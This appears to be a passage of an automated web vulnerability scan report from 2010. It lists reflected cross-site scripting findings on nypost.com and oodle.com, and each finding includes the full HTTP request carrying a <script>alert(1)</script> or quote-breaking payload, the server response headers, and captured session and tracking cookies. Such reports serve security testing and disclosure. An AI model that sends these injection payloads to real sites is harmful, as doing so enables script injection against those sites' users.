GET /rw/SysConfig/WebPortal/nypost97d83<script>alert(1)</script>2f4608182c0/unica/hbx_original.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:44 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5ad8c<script>alert(1)</script>f87f55a7e8b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/unica5ad8c<script>alert(1)</script>f87f55a7e8b/hbx_original.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:45 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 45010<script>alert(1)</script>432d944b730 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js45010<script>alert(1)</script>432d944b730 HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:45 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7cf57<script>alert(1)</script>947f89fd93a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig7cf57<script>alert(1)</script>947f89fd93a/WebPortal/nypost/unica/migration.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:53 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27d7e<script>alert(1)</script>4ab2ac3b8e8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal27d7e<script>alert(1)</script>4ab2ac3b8e8/nypost/unica/migration.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:54 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3063c<script>alert(1)</script>87f44a199fe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost3063c<script>alert(1)</script>87f44a199fe/unica/migration.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:54 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 62042<script>alert(1)</script>e768e25bd10 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/unica62042<script>alert(1)</script>e768e25bd10/migration.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:54 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 97978<script>alert(1)</script>bd993e6441a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/unica/migration.js97978<script>alert(1)</script>bd993e6441a HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:55 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c1350<script>alert(1)</script>c23b0965f93 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfigc1350<script>alert(1)</script>c23b0965f93/WebPortal/nypost/unica/ntpagetag.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:55 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3587c<script>alert(1)</script>dfe201754e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal3587c<script>alert(1)</script>dfe201754e1/nypost/unica/ntpagetag.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:56 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dcef3<script>alert(1)</script>b924448cc4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypostdcef3<script>alert(1)</script>b924448cc4/unica/ntpagetag.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 704 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:57 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 72d2f<script>alert(1)</script>2ebfc73401 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/unica72d2f<script>alert(1)</script>2ebfc73401/ntpagetag.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 704 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:57 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 82555<script>alert(1)</script>cd916418285 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js82555<script>alert(1)</script>cd916418285 HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:58 GMT Connection: close
1.242. http://www.oodle.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oodle.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc5be"><script>alert(1)</script>54f964f95d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?cc5be"><script>alert(1)</script>54f964f95d1=1 HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 20:23:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=04039d161b6f4d305c54caf045ea7f92; path=/; domain=.oodle.com Set-Cookie: a=dT1ENEZFQzYxNTRDRjAxNzU3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMDMxO30%3D; path=/; domain=.oodle.com Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Content-Length: 46444
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6127"-alert(1)-"a678d9503d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browsec6127"-alert(1)-"a678d9503d9/-/social_circle_all/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 20:34:30 GMT Content-Length: 18649 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjcwO30%3D; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bd8b"><script>alert(1)</script>962195aab20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse4bd8b"><script>alert(1)</script>962195aab20/-/social_circle_all/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 20:34:29 GMT Content-Length: 18723 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjY5O30%3D; path=/; domain=.oodle.com
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e368"><script>alert(1)</script>f8526cc3d79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/9e368"><script>alert(1)</script>f8526cc3d79/social_circle_all/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 20:34:30 GMT Content-Length: 23978 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjcwO30%3D; path=/; domain=.oodle.com
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80c56"-alert(1)-"ee7e3a7ae52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pro80c56"-alert(1)-"ee7e3a7ae52/fb-follow/ HTTP/1.1 Host: www.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=e6dd4ce4eaa6fe6767f31491546899c7; __utmz=172606844.1290806340.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; a=dT1ENEZFQzYxNTRDRjAxNzU3; 90184176_clogin=l=1290806340&v=1&e=1290809994475; CoreID6=18537498022812908063401; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzMjU2O30%3D; cmTPSet=Y; ots=04039d161b6f4d305c54caf045ea7f92; __utma=172606844.1790924911.1290806340.1290806340.1290806340.1; loc_USA_selected=aTowOw%3D%3D; __utmc=172606844; __utmb=172606844.5.10.1290806340; __qca=P0-1736792491-1290806340484;
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Fri, 26 Nov 2010 20:33:33 GMT Content-Length: 18583 Connection: close Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODAzNjE0O30%3D; path=/; domain=.oodle.com
